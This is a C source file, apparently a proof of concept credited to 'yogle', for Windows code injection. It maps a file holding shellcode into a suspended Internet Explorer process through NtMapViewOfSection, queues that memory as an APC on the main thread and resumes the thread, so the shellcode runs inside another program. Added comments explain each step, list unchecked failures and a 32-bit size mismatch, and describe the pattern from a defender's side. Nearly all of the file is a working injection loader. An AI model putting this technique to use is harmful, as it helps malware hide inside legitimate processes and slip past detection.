原作者:yogle

#define _WIN32_WINNT 0x0400
#include <windows.h>

// Native-API status type and success test, declared locally (presumably so
// that <windows.h> alone suffices; the DDK/winternl headers are not
// included). Any non-negative NTSTATUS value counts as success.
typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

// Local copy of the native SECTION_INHERIT enumeration, used as the
// InheritDisposition argument of NtMapViewOfSection; this file only ever
// passes ViewShare. (Tag names of the form _Uppercase are reserved for the
// implementation in C/C++; it is kept here to match the original.)
typedef enum _SECTION_INHERIT
{
 ViewShare = 1,
 ViewUnmap = 2
} SECTION_INHERIT;

 

// Prototype for ntdll!NtMapViewOfSection in the argument order used by the
// single call site in MyMapViewOfFileEx below:
//   SectionHandle, ProcessHandle, BaseAddress (in/out), ZeroBits, CommitSize,
//   SectionOffset (in/out), ViewSize (in/out), InheritDisposition,
//   AllocationType, Win32Protect.
typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*,
                SECTION_INHERIT, ULONG, ULONG );

// Resolved at run time in WinMain via LoadLibrary/GetProcAddress on
// ntdll.dll. It stays NULL when that lookup fails, and MyMapViewOfFileEx
// calls through it without checking for NULL.
func_NtMapViewOfSection NtMapViewOfSection = NULL;

/**
 * MapViewOfFileEx-style wrapper over the native NtMapViewOfSection call,
 * extended with an explicit process handle: the view of hFileMappingObject
 * is created inside hProcess rather than in the calling process.
 *
 * @param hProcess             Process whose address space receives the view.
 * @param hFileMappingObject   Section handle (here produced by CreateFileMapping).
 * @param dwDesiredAccess      FILE_MAP_* flags, reduced to one PAGE_* protection
 *                             below: FILE_MAP_WRITE takes precedence over
 *                             FILE_MAP_READ, which takes precedence over
 *                             FILE_MAP_COPY; anything else yields PAGE_NOACCESS.
 * @param dwFileOffsetHigh     High and low halves of the 64-bit section offset.
 * @param dwFileOffsetLow
 * @param dwNumberOfBytesToMap Requested view size (WinMain passes 0, which the
 *                             native call treats as "the whole section").
 * @param lpBaseAddress        Preferred base address, or NULL to let the kernel
 *                             choose.
 * @return Base address of the new view inside hProcess, or NULL on any failing
 *         NTSTATUS. The status code is discarded and GetLastError is not set,
 *         so the caller cannot distinguish failure reasons.
 *
 * Relies on the file-scope NtMapViewOfSection pointer having been resolved
 * beforehand; it is dereferenced without a NULL check.
 */
LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh,
        DWORD dwFileOffsetLow, DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )  
{
 NTSTATUS Status;
 LARGE_INTEGER SectionOffset;
 // NOTE(review): declared ULONG but passed as &ViewSize to the SIZE_T*
 // parameter of the typedef above. The two types differ in width on 64-bit
 // builds, where the out-value would overrun this variable; the code as
 // written appears to assume a 32-bit target — confirm before reuse.
 ULONG ViewSize;
 ULONG Protect;
 LPVOID ViewBase;


 // Assemble the 64-bit section offset from the two DWORD halves.
 SectionOffset.LowPart = dwFileOffsetLow;
 SectionOffset.HighPart = dwFileOffsetHigh;

 // Both are in/out parameters of the native call: on success ViewBase holds
 // the actual base chosen by the kernel and ViewSize the actual view size.
 ViewBase = lpBaseAddress;
 ViewSize = dwNumberOfBytesToMap;

 // Reduce the Win32 FILE_MAP_* access flags to a single NT page protection.
 // Only the first matching flag counts; the branch order defines precedence.
 if (dwDesiredAccess & FILE_MAP_WRITE)
 {
  Protect  = PAGE_READWRITE;
 }
 else if (dwDesiredAccess & FILE_MAP_READ)
 {
  Protect = PAGE_READONLY;
 }
 else if (dwDesiredAccess & FILE_MAP_COPY)
 {
  Protect = PAGE_WRITECOPY;
 }
 else
 {
  Protect = PAGE_NOACCESS;
 }

 // Map the section into the target process. ZeroBits and CommitSize are 0,
 // the view is shared (ViewShare) and no AllocationType flags are requested.
 Status = NtMapViewOfSection(hFileMappingObject, hProcess, &ViewBase, 0, 0, &SectionOffset, &ViewSize, ViewShare, 0, Protect);
 if (!NT_SUCCESS(Status))
 {
  // Failure: the NTSTATUS is dropped and only NULL is reported.
  return NULL;
 }

 // Return the base address the kernel actually assigned in hProcess.
 return ViewBase;
}

 


/**
 * Proof-of-concept driver: opens a file on disk, maps it as a section into a
 * freshly created (suspended) process, and queues the mapped address as a
 * user-mode APC on that process's initial thread before resuming it.
 *
 * Unnamed parameters in a definition are C++ (or C23) syntax, so this file is
 * not valid C11 as written. No return value in this function is checked; see
 * the per-call notes below for what happens when a step fails.
 *
 * From a defender's perspective, the sequence is the classic
 * section-mapping + APC injection pattern: CREATE_SUSPENDED process start,
 * a cross-process NtMapViewOfSection into it, QueueUserAPC on its main thread,
 * then ResumeThread. Each of these steps is individually observable.
 *
 * @return Always 0, regardless of whether any step succeeded.
 */
int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
 // Narrow-string LoadLibrary, i.e. a non-UNICODE build is assumed. A NULL
 // hDll is passed on to GetProcAddress unchecked.
 HMODULE hDll = LoadLibrary( "ntdll.dll" );

 // Fills the file-scope pointer used by MyMapViewOfFileEx; if the lookup
 // fails the pointer stays NULL and the later call through it is a crash.
 NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");


 // Payload source: a fixed path opened read-only. On failure hFile is
 // INVALID_HANDLE_VALUE and is passed straight into CreateFileMapping.
 HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

 // Read-only section over the whole file (max size 0,0 = file size).
 HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);


 // Target process, started suspended so its initial thread has not yet run
 // when the APC is queued. The path is the German-locale "Program Files"
 // folder, so the PoC is tied to that installation layout.
 STARTUPINFO st;
 ZeroMemory (&st, sizeof(st));
 st.cb = sizeof (STARTUPINFO);

 PROCESS_INFORMATION pi;
 ZeroMemory (&pi, sizeof(pi));

 // Unchecked: because pi was zeroed above, a failed CreateProcess leaves
 // NULL handles that are then handed to the mapping and APC calls below.
 CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);


 // Map the section into the target's address space. FILE_MAP_READ reduces
 // to PAGE_READONLY in MyMapViewOfFileEx; size 0 requests the whole
 // section and NULL base lets the kernel pick the address. NULL on failure
 // is not checked and would be queued as the APC routine below.
 LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);


 // Queue the view's base address as an APC routine (argument NULL) on the
 // primary thread. The original author's expectation is that it runs first
 // when the thread resumes; actual delivery timing of user APCs is not
 // established by anything in this file.
 QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);

 ResumeThread (pi.hThread);


 // Release local handles. The view in the target is never unmapped, and
 // the CloseHandle results are ignored.
 CloseHandle (hFile);
 CloseHandle (hMappedFile);
 CloseHandle (pi.hThread);
 CloseHandle (pi.hProcess);
 return 0;
}
